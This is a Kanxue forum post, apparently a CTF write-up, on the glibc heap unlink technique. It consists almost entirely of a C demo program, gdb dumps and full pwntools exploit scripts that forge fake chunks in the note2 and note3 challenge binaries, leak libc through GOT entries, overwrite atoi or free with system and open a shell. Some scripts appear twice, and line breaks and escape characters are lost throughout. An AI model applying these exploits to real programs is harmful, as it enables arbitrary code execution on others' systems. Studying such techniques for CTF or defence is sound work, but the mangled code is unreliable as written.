本文为看雪论坛精华文章
看雪论坛作者ID:yichen115
#include <stdio.h>#include <stdlib.h>#include <string.h>#include <stdint.h>uint64_t *chunk0_ptr;int main() {int malloc_size = 0x80; // not fastbinsint header_size = 2;chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1fprintf(stderr, "The global chunk0_ptr is at %p, pointing to %pn", &chunk0_ptr, chunk0_ptr);fprintf(stderr, "The victim chunk we are going to corrupt is at %pnn", chunk1_ptr);chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);fprintf(stderr, "Fake chunk fd: %pn", (void*) chunk0_ptr[2]);fprintf(stderr, "Fake chunk bk: %pnn", (void*) chunk0_ptr[3]);uint64_t *chunk1_hdr = chunk1_ptr - header_size;chunk1_hdr[0] = malloc_size;chunk1_hdr[1] &= ~1;free(chunk1_ptr);char victim_string[9];strcpy(victim_string, "AAAAAAAA");chunk0_ptr[3] = (uint64_t) victim_string;fprintf(stderr, "Original value: %sn", victim_string);chunk0_ptr[0] = 0x4242424242424242LL;fprintf(stderr, "New Value: %sn", victim_string);}
gdb-peda$ x/4gx 0x00000000006010580x601058: 0x0000000000000000 0x00007ffff7dd25400x601068: 0x0000000000000000 0x00000000006020100x601058是我们伪造的那个堆块的fd指针,在这里可以看到它的bk指针指向的是0x602010gdb-peda$ x/4gx 0x00000000006010600x601060: 0x00007ffff7dd2540 0x00000000000000000x601070: 0x0000000000602010 0x00000000000000000x601060是我们伪造的那个堆块的bk指针,在这里可以看到它的fd指针指向的是0x602010
# coding=UTF-8from pwn import *context.log_level = 'debug'p = process('./note2')note2 = ELF('./note2')libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')context.log_level = 'debug'def create(length, content):p.recvuntil('option--->>')p.sendline('1')p.recvuntil('(less than 128)')p.sendline(str(length))p.recvuntil('content:')p.sendline(content)def show(id):p.recvuntil('option--->>')p.sendline('2')p.recvuntil('note:')p.sendline(str(id))def edit(id, choice, s):p.recvuntil('option--->>')p.sendline('3')p.recvuntil('note:')p.sendline(str(id))p.recvuntil('2.append]')p.sendline(str(choice))p.sendline(s)def delete(id):p.recvuntil('option--->>')p.sendline('4')p.recvuntil('note:')p.sendline(str(id))p.sendlineafter('name:','yichen')p.sendlineafter('address:','yichen')ptr=0x602120payload='a'*8+p64(0x61)+p64(ptr-0x18)+p64(ptr-0x10)+'a'*64+p64(0x60)create(0x80,payload)create(0,'a'*16)create(0x80,'a'*16)delete(1)content='a'*16+p64(0xa0)+p64(0x90)create(0,content)delete(2)atoi_got = note2.got['atoi']content = 'a' * 0x18 + p64(atoi_got)edit(0, 1, content)show(0)atoi_addr = u64(p.recvuntil('x7f')[-6:].ljust(8, 'x00'))atoi_offest = libc.symbols['atoi']libcbase = atoi_addr - atoi_offestsystem_offest = libc.symbols['system']system_addr = libcbase + system_offestcontent = p64(system_addr)edit(0, 1, content)p.recvuntil('option--->>')p.sendline('/bin/sh')p.interactive()
payload = p64(0)+p64(0x20)+p64(head+16-0x18)+p64(head+16-0x10)+p64(0x20)payload = payload.ljust(0x30,'a')payload += p64(0x30)+p64(0x90)
payload = p64(0)+p64(free_got)+p64(puts_got)+p64(atoi_got)edit(2,len(payload),payload)
payload = p64(puts_plt)edit(0,len(payload),payload)
payload = p64(sys_addr)edit(2,len(payload),payload)
# coding=UTF-8from pwn import *context.log_level = 'debug'p = process('./note2')note2 = ELF('./note2')libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')context.log_level = 'debug'def create(length, content):p.recvuntil('option--->>')p.sendline('1')p.recvuntil('(less than 128)')p.sendline(str(length))p.recvuntil('content:')p.sendline(content)def show(id):p.recvuntil('option--->>')p.sendline('2')p.recvuntil('note:')p.sendline(str(id))def edit(id, choice, s):p.recvuntil('option--->>')p.sendline('3')p.recvuntil('note:')p.sendline(str(id))p.recvuntil('2.append]')p.sendline(str(choice))p.sendline(s)def delete(id):p.recvuntil('option--->>')p.sendline('4')p.recvuntil('note:')p.sendline(str(id))p.sendlineafter('name:','yichen')p.sendlineafter('address:','yichen')ptr=0x602120payload='a'*8+p64(0x61)+p64(ptr-0x18)+p64(ptr-0x10)+'a'*64+p64(0x60)create(0x80,payload)create(0,'a'*16)create(0x80,'a'*16)delete(1)content='a'*16+p64(0xa0)+p64(0x90)create(0,content)delete(2)atoi_got = note2.got['atoi']content = 'a' * 0x18 + p64(atoi_got)edit(0, 1, content)show(0)atoi_addr = u64(p.recvuntil('x7f')[-6:].ljust(8, 'x00'))atoi_offest = libc.symbols['atoi']libcbase = atoi_addr - atoi_offestsystem_offest = libc.symbols['system']system_addr = libcbase + system_offestcontent = p64(system_addr)edit(0, 1, content)p.recvuntil('option--->>')p.sendline('/bin/sh')p.interactive()
delete(1)content='a'*16+p64(0xa0)+p64(0x90)create(0,content)
atoi_got = note2.got['atoi']content = 'a' * 0x18 + p64(atoi_got)editnote(0, 1, content)
payload3 = 'a'*0x18 + p64(free_got) + p64(puts_got)edit(0,payload3)edit(0,p64(puts_plt)[:-1])delete(1)
from pwn import *p=process('./note3')elf=ELF('./note3')libc=ELF('./libc.so.6')def cmd(choice):p.sendlineafter('option--->>n',str(choice))def create(size,content):cmd(1)p.sendlineafter('1024)n',str(size))p.sendlineafter('content:n',content)def edit(index,content):cmd(3)p.sendlineafter('note:n',str(index))p.sendlineafter('content:n',content)def delete(index):cmd(4)p.sendlineafter('note:n',str(index))ptr=0x6020C8fake_chunk='a'*8+p64(0xa1)+p64(ptr-0x18)+p64(ptr-0x10)create(0x80,fake_chunk)create(0,'123')create(0x80,'writeup')delete(1)payload='a'*0x10 + p64(0xa0) + p64(0x90)create(0,payload)delete(2)puts_got = elf.got["puts"]puts_plt = elf.plt["puts"]free_got = elf.got["free"]system = libc.symbols['system']puts = libc.symbols['puts']payload3 = 'a'*0x18 + p64(free_got) + p64(puts_got)edit(0,payload3)edit(0,p64(puts_plt)[:-1])delete(1)puts_addr = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))create(0x20,'/bin/sh�0')libcbase = puts_addr - putssystem_addr = libcbase + systemedit(0,p64(system_addr)[:-1])delete(1)p.interactive()
看雪ID:yichen115
https://bbs.pediy.com/user-837755.htm
*本文由看雪论坛 yichen115 原创,转载请注明来自看雪社区。
推荐文章++++
求分享
求点赞
求在看
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论